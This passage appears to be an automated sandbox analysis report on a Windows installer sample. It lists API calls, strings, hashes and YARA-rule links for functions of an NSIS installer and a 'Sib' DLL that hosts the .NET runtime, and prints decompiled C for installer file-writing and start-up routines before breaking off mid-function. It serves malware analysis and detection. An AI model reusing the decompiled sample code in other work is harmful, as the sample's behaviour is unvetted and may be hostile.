                                                                                                                                                    • String ID: C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\Lznt.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\Lznt.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\Lznt.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\Lznt.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\Lznt.cpp$RtlCompressBuffer$RtlDecompressBuffer$RtlGetCompressionWorkSpaceSize$ntdll.dll
                                                                                                                                                    • API String ID: 1508282030-1192085491
                                                                                                                                                    • Opcode ID: c005ae73c06fc48684041e35979ab75fc5524a7c3db367078265d49407063442
                                                                                                                                                    • Instruction ID: 9366e70417c48f0f3af0498a6fdb4504ffacba0af244a34de9eac080533de4a8
                                                                                                                                                    • Opcode Fuzzy Hash: c005ae73c06fc48684041e35979ab75fc5524a7c3db367078265d49407063442
                                                                                                                                                    • Instruction Fuzzy Hash: BE8106B4D00209EFDB44CFE4D954BAEBBB4BF49324F104629E515BB380EB746A01CBA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E623410, Relevance: 28.2, APIs: 4, Strings: 12, Instructions: 250memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E6234D2
                                                                                                                                                    • std::ios_base::good.LIBCPMTD ref: 6E6234F8
                                                                                                                                                    • SetCurrentDirectoryW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00000000,000000FF,3920FDCC), ref: 6E6236C8
                                                                                                                                                    • SetCurrentDirectoryW.KERNELBASE(00000000,?,00000000,00000000,?,?,?,?,00000000,000000FF,3920FDCC), ref: 6E623705
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CurrentDirectory$AllocatorDebugHeapstd::ios_base::good
                                                                                                                                                    • String ID: %s\%d$Action: %s...$C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibInstaller\Install.cpp$InitSession$Installation aborted$Installation canceled.$Installation complete.$Starting Installation.$Starting Uninstallation.$Uninstallation complete.$cond_pkg$hAn
                                                                                                                                                    • API String ID: 2253133653-724938291
                                                                                                                                                    • Opcode ID: 9c141cfc6d5b666d9316a5784925f4b7f25ebfdd9991e008a2e18a1424420442
                                                                                                                                                    • Instruction ID: 27db5863724a9a8b2ebde0ced13fa6a75ec9f507c268be980e992632258971ff
                                                                                                                                                    • Opcode Fuzzy Hash: 9c141cfc6d5b666d9316a5784925f4b7f25ebfdd9991e008a2e18a1424420442
                                                                                                                                                    • Instruction Fuzzy Hash: 20A13BB0D402069FDF04DFE5C964BEEB7B9AB45318F104529E4157B381DB35A940CFAA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E6255A0, Relevance: 24.7, APIs: 3, Strings: 11, Instructions: 200filememoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E625860: _DebugHeapAllocator.LIBCPMTD ref: 6E6258B5
                                                                                                                                                      • Part of subcall function 6E625840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6E62584A
                                                                                                                                                      • Part of subcall function 6E631050: _DebugHeapAllocator.LIBCPMTD ref: 6E6310C6
                                                                                                                                                      • Part of subcall function 6E631050: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6E6310D2
                                                                                                                                                      • Part of subcall function 6E631050: std::ios_base::good.LIBCPMTD ref: 6E6310DA
                                                                                                                                                      • Part of subcall function 6E661373: CreateDirectoryW.KERNELBASE(00000000,6E6314AA,?,?,?,6E6314AA,00000000,00000000), ref: 6E661381
                                                                                                                                                      • Part of subcall function 6E661373: GetLastError.KERNEL32(?,?,?,6E6314AA,00000000,00000000), ref: 6E66138F
                                                                                                                                                    • CopyFileW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,?,00000000,00000000,6E64F5C0,?,00000001,3920FDCC), ref: 6E625707
                                                                                                                                                    • CopyFileW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E625770
                                                                                                                                                      • Part of subcall function 6E661373: CreateDirectoryW.KERNELBASE(00000000,6E6314AA,?,?,?,?,6E6314AA,00000000,00000000), ref: 6E6613FF
                                                                                                                                                      • Part of subcall function 6E661373: GetLastError.KERNEL32(?,?,?,?,6E6314AA,00000000,00000000), ref: 6E661409
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E6257F0
                                                                                                                                                      • Part of subcall function 6E623980: _DebugHeapAllocator.LIBCPMTD ref: 6E623A15
                                                                                                                                                      • Part of subcall function 6E623980: _DebugHeapAllocator.LIBCPMTD ref: 6E623A28
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorDebugHeap$Base::Concurrency::details::ContextCopyCreateDirectoryErrorFileIdentityLastQueueWork$std::ios_base::good
                                                                                                                                                    • String ID: C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibInstaller\Install.cpp$W7bn$[CommonAppDataFolder]\sib\%s$\SibCa.dll$\SibCa.dll$\SibClr.dll$\SibClr.dll$\sib.dat$hAn$productCode$|ohn
                                                                                                                                                    • API String ID: 1853039035-2652871690
                                                                                                                                                    • Opcode ID: dd18fa3af5772259d78128a67fa898f199e6cdee2edd652c86cc954a5a79b0dd
                                                                                                                                                    • Instruction ID: 3aa3e11e1f420c19e2be313e8b4673744f097f6bac784280f777ca45e7ec4cc3
                                                                                                                                                    • Opcode Fuzzy Hash: dd18fa3af5772259d78128a67fa898f199e6cdee2edd652c86cc954a5a79b0dd
                                                                                                                                                    • Instruction Fuzzy Hash: D5812C70D10209EFDB04DFE4D990BEEBBBDAF55314F104929E415AB284DB746A04CFAA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00401A1F, Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 54%
                                                                                                                                                    			E00401A1F(FILETIME* __ebx) {
				signed int _t31;
				void* _t35;
				void* _t43;
				void* _t45;
				void* _t51;
				void* _t67;
				void* _t74;
				FILETIME* _t83;
				signed int _t94;
				void* _t96;
				void* _t98;
				WCHAR* _t100;
				WCHAR* _t101;
				void* _t103;

				_t83 = __ebx;
				_t100 = E0040145C(_t96, 0x31);
				_t31 =  *(_t103 - 0x2c);
				_push(_t100);
				_push(_t31 >> 0x00000003 & 0x00000002);
				 *(_t103 - 0x34) = _t100;
				 *(_t103 + 8) = _t31 & 0x00000007;
				E004062CF(L"File: overwriteflag=%d, allowskipfilesflag=%d, name=\"%s\"", _t31 & 0x00000007);
				_t35 = E00405D51(_t100);
				_push(_t100);
				_t101 = L"install";
				if(_t35 == 0) {
					lstrcatW(E0040674E(E00406035(_t101, 0x4d70b0)), ??);
				} else {
					E00406035();
				}
				E00406064(_t101);
				L6:
				L6:
				if( *(_t103 + 8) >= 3) {
					_t74 = E00406301(_t101);
					_t94 = 0;
					if(_t74 != _t83) {
						_t94 = CompareFileTime(_t74 + 0x14, _t103 - 0x20);
					}
					asm("sbb eax, eax");
					 *(_t103 + 8) =  ~(( *(_t103 + 8) + 0xfffffffd | 0x80000000) & _t94) + 1;
				}
				if( *(_t103 + 8) == _t83) {
					E00405E5C(_t101);
				}
				_t43 = E00405E7C(_t101, 0x40000000, (0 |  *(_t103 + 8) != 0x00000001) + 1);
				 *(_t103 - 8) = _t43;
				if(_t43 != 0xffffffff) {
					goto L24;
				}
				if( *(_t103 + 8) != _t83) {
					E00404F9E(0xffffffe2,  *(_t103 - 0x34));
					if( *(_t103 + 8) == 2) {
						 *((intOrPtr*)(_t103 - 4)) = 1;
					}
					_push( *(_t103 + 8));
					_push(_t101);
					_push(L"File: skipped: \"%s\" (overwriteflag=%d)");
					E004062CF();
					L33:
					 *0x47eb68 =  *0x47eb68 +  *((intOrPtr*)(_t103 - 4));
					goto L34;
				} else {
					E004062CF(L"File: error creating \"%s\"", _t101);
					E00406035(0x4140f8, 0x47f000);
					E00406035(0x47f000, _t101);
					E00406831(_t83, 0x4140f8, _t101, 0x4100f0,  *((intOrPtr*)(_t103 - 0x18)));
					E00406035(0x47f000, 0x4140f8);
					_t67 = E00405CCC(0x4100f0,  *(_t103 - 0x2c) >> 3) - 4;
					if(_t67 != 0) {
						if(_t67 == 1) {
							_push(L"File: error, user cancel");
							E004062CF();
							 *0x47eb68 =  *0x47eb68 + 1;
							L34:
							_t51 = 0;
						} else {
							_push(L"File: error, user abort");
							E004062CF();
							_push(_t101);
							_push(0xfffffffa);
							E00404F9E();
							L2:
							_t51 = 0x7fffffff;
						}
					} else {
						_push(L"File: error, user retry");
						E004062CF();
						goto L6;
					}
				}
				L35:
				return _t51;
				L24:
				E00404F9E(0xffffffea,  *(_t103 - 0x34));
				 *0x47eb94 =  *0x47eb94 + 1;
				_t45 = E0040337F( *((intOrPtr*)(_t103 - 0x24)),  *(_t103 - 8), _t83, _t83); // executed
				 *0x47eb94 =  *0x47eb94 - 1;
				_t98 = _t45;
				_push(_t101);
				E004062CF(L"File: wrote %d to \"%s\"", _t98);
				if( *(_t103 - 0x20) != 0xffffffff ||  *((intOrPtr*)(_t103 - 0x1c)) != 0xffffffff) {
					SetFileTime( *(_t103 - 8), _t103 - 0x20, _t83, _t103 - 0x20);
				}
				FindCloseChangeNotification( *(_t103 - 8)); // executed
				if(_t98 >= _t83) {
					goto L33;
				} else {
					if(_t98 != 0xfffffffe) {
						E00406831(_t83, _t98, _t101, _t101, 0xffffffee);
					} else {
						E00406831(_t83, _t98, _t101, _t101, 0xffffffe9);
						lstrcatW(_t101,  *(_t103 - 0x34));
					}
					E004062CF(L"%s", _t101);
					_push(0x200010);
					_push(_t101);
					E00405CCC();
					goto L2;
				}
				goto L35;
			}

















                                                                                                                                                    0x00401a1f
                                                                                                                                                    0x00401a26
                                                                                                                                                    0x00401a28
                                                                                                                                                    0x00401a30
                                                                                                                                                    0x00401a37
                                                                                                                                                    0x00401a3e
                                                                                                                                                    0x00401a41
                                                                                                                                                    0x00401a44
                                                                                                                                                    0x00401a4d
                                                                                                                                                    0x00401a52
                                                                                                                                                    0x00401a53
                                                                                                                                                    0x00401a5a
                                                                                                                                                    0x00401a76
                                                                                                                                                    0x00401a5c
                                                                                                                                                    0x00401a5d
                                                                                                                                                    0x00401a5d
                                                                                                                                                    0x00401a7c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401a86
                                                                                                                                                    0x00401a8a
                                                                                                                                                    0x00401a8d
                                                                                                                                                    0x00401a92
                                                                                                                                                    0x00401a96
                                                                                                                                                    0x00401aa6
                                                                                                                                                    0x00401aa6
                                                                                                                                                    0x00401ab7
                                                                                                                                                    0x00401aba
                                                                                                                                                    0x00401aba
                                                                                                                                                    0x00401ac0
                                                                                                                                                    0x00401ac3
                                                                                                                                                    0x00401ac3
                                                                                                                                                    0x00401ad9
                                                                                                                                                    0x00401ade
                                                                                                                                                    0x00401ae4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401aed
                                                                                                                                                    0x00401b6b
                                                                                                                                                    0x00401b74
                                                                                                                                                    0x00401b76
                                                                                                                                                    0x00401b76
                                                                                                                                                    0x00401b7d
                                                                                                                                                    0x00401b80
                                                                                                                                                    0x00401b81
                                                                                                                                                    0x00401b86
                                                                                                                                                    0x004030e3
                                                                                                                                                    0x004030e6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401aef
                                                                                                                                                    0x00401af5
                                                                                                                                                    0x00401b02
                                                                                                                                                    0x00401b0d
                                                                                                                                                    0x00401b1a
                                                                                                                                                    0x00401b25
                                                                                                                                                    0x00401b3b
                                                                                                                                                    0x00401b3e
                                                                                                                                                    0x00401b51
                                                                                                                                                    0x00401b93
                                                                                                                                                    0x00401b98
                                                                                                                                                    0x00401b9d
                                                                                                                                                    0x004030ec
                                                                                                                                                    0x004030ec
                                                                                                                                                    0x00401b53
                                                                                                                                                    0x00401b53
                                                                                                                                                    0x00401b58
                                                                                                                                                    0x00401b5e
                                                                                                                                                    0x00401b5f
                                                                                                                                                    0x0040162d
                                                                                                                                                    0x00401632
                                                                                                                                                    0x00401632
                                                                                                                                                    0x00401632
                                                                                                                                                    0x00401b40
                                                                                                                                                    0x00401b40
                                                                                                                                                    0x00401b45
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401b4a
                                                                                                                                                    0x00401b3e
                                                                                                                                                    0x004030ee
                                                                                                                                                    0x004030f2
                                                                                                                                                    0x00401ba9
                                                                                                                                                    0x00401bae
                                                                                                                                                    0x00401bb3
                                                                                                                                                    0x00401bc1
                                                                                                                                                    0x00401bc6
                                                                                                                                                    0x00401bcc
                                                                                                                                                    0x00401bce
                                                                                                                                                    0x00401bd5
                                                                                                                                                    0x00401be1
                                                                                                                                                    0x00401bf2
                                                                                                                                                    0x00401bf2
                                                                                                                                                    0x00401bfb
                                                                                                                                                    0x00401c03
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401c09
                                                                                                                                                    0x00401c0c
                                                                                                                                                    0x00401c24
                                                                                                                                                    0x00401c0e
                                                                                                                                                    0x00401c11
                                                                                                                                                    0x00401c1a
                                                                                                                                                    0x00401c1a
                                                                                                                                                    0x00401c2f
                                                                                                                                                    0x00401c36
                                                                                                                                                    0x00401c3b
                                                                                                                                                    0x00401c3c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401c3c
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory on Reboot("C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                    • lstrcatW.KERNEL32(00000000,00000000), ref: 00401A76
                                                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,install,install,00000000,00000000,install,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00425AD2,74B5EA30,00000000), ref: 00404FD6
                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00425AD2,74B5EA30,00000000), ref: 00404FE6
                                                                                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5), ref: 00404FF9
                                                                                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                    • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$install
                                                                                                                                                    • API String ID: 4286501637-2455569613
                                                                                                                                                    • Opcode ID: 23359e57e86623cb041ae238ad4d2dfc68e00f0e31f0802a264bc06316deb979
                                                                                                                                                    • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                    • Opcode Fuzzy Hash: 23359e57e86623cb041ae238ad4d2dfc68e00f0e31f0802a264bc06316deb979
                                                                                                                                                    • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E62A240, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 170memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E629B60: SysAllocString.OLEAUT32(?), ref: 6E629B9A
                                                                                                                                                      • Part of subcall function 6E629B60: SysAllocString.OLEAUT32(00000000), ref: 6E629C35
                                                                                                                                                      • Part of subcall function 6E629B60: SysAllocString.OLEAUT32(00000000), ref: 6E629CD4
                                                                                                                                                    • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000003), ref: 6E62A2A4
                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 6E62A2BA
                                                                                                                                                    • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6E62A2D6
                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 6E62A2FA
                                                                                                                                                    • SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6E62A319
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 6E62A418
                                                                                                                                                    • SafeArrayDestroy.OLEAUT32(00000000), ref: 6E62A422
                                                                                                                                                    Strings
                                                                                                                                                    • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp, xrefs: 6E62A42E
                                                                                                                                                    • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp, xrefs: 6E62A3C8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocString$ArraySafe$Element$ClearCreateDestroyVariantVector
                                                                                                                                                    • String ID: C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp
                                                                                                                                                    • API String ID: 1364862699-1439456480
                                                                                                                                                    • Opcode ID: 26d27e8be15eb62b8172d861dff29f48cb9e22d404f73275a5575411e89c152c
                                                                                                                                                    • Instruction ID: 9c45bc1e357d743220b803b6544559ebefca2ae8118ab9bed22c6336669b8c8f
                                                                                                                                                    • Opcode Fuzzy Hash: 26d27e8be15eb62b8172d861dff29f48cb9e22d404f73275a5575411e89c152c
                                                                                                                                                    • Instruction Fuzzy Hash: 6C71E5B5D10609EFCB04CFE4C944BEEBBB8BF59310F108629E516A7280DB746A45CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E630B60, Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 264memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E630C3C
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E630C8C
                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000104,00000104,3920FDCC), ref: 6E630CCA
                                                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000104,3920FDCC), ref: 6E630CF7
                                                                                                                                                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6E630D17
                                                                                                                                                    • ~.LIBCPMTD ref: 6E630DC8
                                                                                                                                                    • task.LIBCPMTD ref: 6E630DD4
                                                                                                                                                    • task.LIBCPMTD ref: 6E630E0A
                                                                                                                                                      • Part of subcall function 6E628FF0: _DebugHeapAllocator.LIBCPMTD ref: 6E629045
                                                                                                                                                      • Part of subcall function 6E625840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6E62584A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorDebugHeap$Base::Concurrency::details::ContextIdentityQueueWorktask$EnvironmentExpandFolderPathStrings
                                                                                                                                                    • String ID: "$PkgDir$Temp$hAn
                                                                                                                                                    • API String ID: 4116297666-2491005037
                                                                                                                                                    • Opcode ID: 2c34b26a668b99d260f58833906777ca1c0555482cd8dc6355da850ba5e80885
                                                                                                                                                    • Instruction ID: b5a7f38a90c21918ff0ef6386a8cf707c2c22106bcd20381f060be430409d328
                                                                                                                                                    • Opcode Fuzzy Hash: 2c34b26a668b99d260f58833906777ca1c0555482cd8dc6355da850ba5e80885
                                                                                                                                                    • Instruction Fuzzy Hash: C2B14C70D00128DFDB24CBE8CC90BEEB779AF55318F6046ADD159A7292EB306A48CF55
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E65A6D6, Relevance: 18.1, APIs: 12, Instructions: 137memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • EnterCriticalSection.KERNEL32(0000001C), ref: 6E65A6E8
                                                                                                                                                    • GlobalAlloc.KERNELBASE(00000002,00000000), ref: 6E65A747
                                                                                                                                                    • GlobalHandle.KERNEL32(00000010), ref: 6E65A750
                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 6E65A759
                                                                                                                                                    • GlobalReAlloc.KERNEL32 ref: 6E65A772
                                                                                                                                                    • GlobalLock.KERNEL32 ref: 6E65A780
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(0000001C), ref: 6E65A7C5
                                                                                                                                                    • GlobalHandle.KERNEL32(00000000), ref: 6E65A7D9
                                                                                                                                                    • GlobalLock.KERNEL32 ref: 6E65A7E0
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 6E65A7E9
                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,00000001,00000000), ref: 6E65A800
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 6E65A82C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Global$CriticalSection$Leave$AllocEnterHandleLock$Unlock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2233717024-0
                                                                                                                                                    • Opcode ID: 31ea1be075e4d3b32030b7ed7476cfebffa7180b9f7cf19711ed3bf6d2d0ad3b
                                                                                                                                                    • Instruction ID: 15a18fcfb7721e2a4fe641f3eea0c19ab5c8ebaa832d760f5f1322a9c381f32f
                                                                                                                                                    • Opcode Fuzzy Hash: 31ea1be075e4d3b32030b7ed7476cfebffa7180b9f7cf19711ed3bf6d2d0ad3b
                                                                                                                                                    • Instruction Fuzzy Hash: 8941F975600205EFDB149FA4C888A9A7BB9EF86315F10846DE852EB345E771E852CFB0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004035B3, Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 99%
                                                                                                                                                    			E004035B3(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				void* _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				 *0x47eb00 = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, 0x4eb0d8, 0x2004);
				_t89 = E00405E7C(0x4eb0d8, 0x80000000, 3);
				_v16 = _t89;
				 *0x40c010 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				E00406035(0x4db0b8, 0x4eb0d8);
				E00406035(0x4ef0e0, E0040677D(0x4db0b8));
				_t50 = GetFileSize(_t89, 0);
				 *0x43dd38 = _t50;
				_t93 = _t50;
				__eflags = _t50;
				if(_t50 <= 0) {
					L24:
					E004032D2(1);
					__eflags =  *0x47eb0c - _t82;
					if( *0x47eb0c == _t82) {
						goto L36;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						E00403368( *0x47eb0c + 0x1c);
						_t57 = E0040337F(0xffffffff, _t82, _t94, _v24);
						__eflags = _t57 - _v24;
						if(_t57 != _v24) {
							goto L36;
						}
						__eflags = _v44 & 0x00000001;
						 *0x47eabc = _t94;
						 *0x47eb08 =  *_t94;
						if((_v44 & 0x00000001) != 0) {
							 *0x47eb04 =  *0x47eb04 + 1;
							__eflags =  *0x47eb04;
						}
						_t85 = 8;
						_t40 = _t94 + 0x44; // 0x44
						_t59 = _t40;
						do {
							_t59 = _t59 - 8;
							 *_t59 =  *_t59 + _t94;
							_t85 = _t85 - 1;
							__eflags = _t85 - _t82;
						} while (_t85 != _t82);
						_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
						 *(_t94 + 0x3c) = _t60;
						E00405E38(0x47eac0, _t94 + 4, 0x40);
						__eflags = 0;
						return 0;
					}
					E00403368( *0x42c174);
					_t65 = E00403336( &_a4, 4); // executed
